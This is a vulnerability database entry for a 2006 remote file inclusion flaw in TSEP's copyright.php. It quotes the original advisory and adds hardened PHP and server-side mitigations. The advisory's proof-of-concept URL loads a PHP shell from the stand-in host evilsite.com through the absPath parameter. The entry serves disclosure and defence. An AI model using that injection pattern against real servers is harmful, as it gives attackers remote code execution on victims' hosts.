The Search Engine Project (TSEP) 'colorswitch.php' Remote File Inclusion Vulnerability

Vulnerability ID: 1110732    Vulnerability type: Input validation
Published: 2006-08-01    Updated: 2006-08-08
CVE: CVE-2006-3993    CNNVD ID: CNNVD-200608-060
Platform: PHP    CVSS score: 5.1
|Vulnerability sources
https://www.exploit-db.com/exploits/2098
https://cxsecurity.com/issue/WLB-2006080032
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-060
|Vulnerability details
The Search Engine Project (TSEP) is open-source software for searching the content of a web site. TSEP has an input validation vulnerability when handling user requests; a remote attacker may exploit it to execute arbitrary commands on the server with the privileges of the web server process. TSEP's colorswitch.php script does not properly validate the tsep_config[absPath] parameter, which allows an attacker to include arbitrary local or external files and thereby execute arbitrary PHP code.
|Vulnerability EXP
+--------------------------------------------------------------------
+
+ TSEP 0.9.4.2
+
+--------------------------------------------------------------------
+
+ Affected Software .: TSEP 0.9.4.2
+ Vendor ............: http://www.tsep.info/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Code /include/copyright.php:
+
+ .....
+ <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?>
+ .....
+
+--------------------------------------------------------------------
+
+ $tsep_config["absPath"] is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+ Include config-File in copyright.php
+
+--------------------------------------------------------------------
+
+ PoC:
+ Place a PHPShell on a remote location:
+ http://evilsite.com/include/tsepversion.txt
+
+ http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsite.com?cmd=ls
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini Gonzales (5 YEARS :P)
+
+-------------------------[ E O F ]----------------------------------

# milw0rm.com [2006-08-01]
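The advisory above boils down to one `require()` whose directory prefix comes from a global that the request can populate. The following is an added example, not TSEP's own code and not part of the original advisory: it restates the vulnerable pattern as a comment and beside it shows a hardened `copyright.php` that applies the advisory's suggested fix (load the configuration file itself instead of trusting an existing global) and additionally validates the configured path before using it in an include. The config file location `../config.php` and the helper name `tsep_safe_abs_path` are assumptions; the page does not give TSEP's real config file name.

```php
<?php
// Added example (not TSEP's code): vulnerable pattern vs. hardened include.

// --- Vulnerable pattern, as quoted in the advisory ---
// With register_globals enabled, $tsep_config['absPath'] can be set from the
// query string, so the require() target is attacker-controlled; if the PHP
// configuration also allows URL includes, it can even point at a remote host.
//
//   require($tsep_config["absPath"] . "/include/tsepversion.txt");

// --- Hardened form ---

// 1. Never rely on a global that may already hold request-supplied data:
//    start from an empty array and load the site's own configuration file.
//    The path below is an assumption; TSEP's real config file name is not on the page.
$tsep_config = array();
require __DIR__ . '/../config.php';

// 2. Validate the configured value before using it as an include prefix.
function tsep_safe_abs_path(array $config): string
{
    $candidate = isset($config['absPath']) ? (string) $config['absPath'] : '';

    // Reject anything with a scheme (http://, ftp://, php://, data:, ...):
    // an include prefix must be a plain local directory, never a URL or stream wrapper.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $candidate)) {
        throw new RuntimeException('absPath must be a local directory, not a URL or stream wrapper');
    }

    // Resolve symlinks and "..", then require a real directory located inside
    // the application root (assumed to be the directory above /include/).
    $appRoot  = realpath(__DIR__ . '/..');
    $resolved = realpath($candidate);
    if ($resolved === false || $appRoot === false || !is_dir($resolved)
        || strpos($resolved . DIRECTORY_SEPARATOR, $appRoot . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('absPath does not resolve to a directory inside the application root');
    }
    return $resolved;
}

$absPath = tsep_safe_abs_path($tsep_config);
require $absPath . '/include/tsepversion.txt';
```

The scheme check and the `realpath()` containment test are defence in depth: even if a future configuration bug let the value be influenced again, a remote URL or a path outside the application tree is refused before `require()` runs. On the server side the same class of issue is blunted by running PHP with `register_globals` off and `allow_url_include` off, so that request parameters cannot silently become globals and `require()` cannot fetch code over the network.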
|References

Source: MISC
Link: https://svn.sourceforge.net/svnroot/tsep/tsep-svn/trunk/delivery/include/copyright.php
Source: XF
Name: tsep-copyright-file-include(28107)
Link: http://xforce.iss.net/xforce/xfdb/28107
Source: BID
Name: 19268
Link: http://www.securityfocus.com/bid/19268
Source: BUGTRAQ
Name: 20060801 TSEP 0.9.4.2 <= Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/441828/100/0/threaded
Source: MILW0RM
Name: 2098
Link: http://www.milw0rm.com/exploits/2098
Source: VUPEN
Name: ADV-2006-3095
Link: http://www.frsirt.com/english/advisories/2006/3095
Source: MISC
Link: http://www.bb-pcsecurity.de/sicherheit_269.htm
Source: SECUNIA
Name: 21291
Link: http://secunia.com/advisories/21291
Source: SECTRACK
Name: 1016626
Link: http://securitytracker.com/id?1016626
Source: SREASON
Name: 1323
Link: http://securityreason.com/securityalert/1323
Source: MILW0RM
Name: 2098
Link: http://milw0rm.com/exploits/2098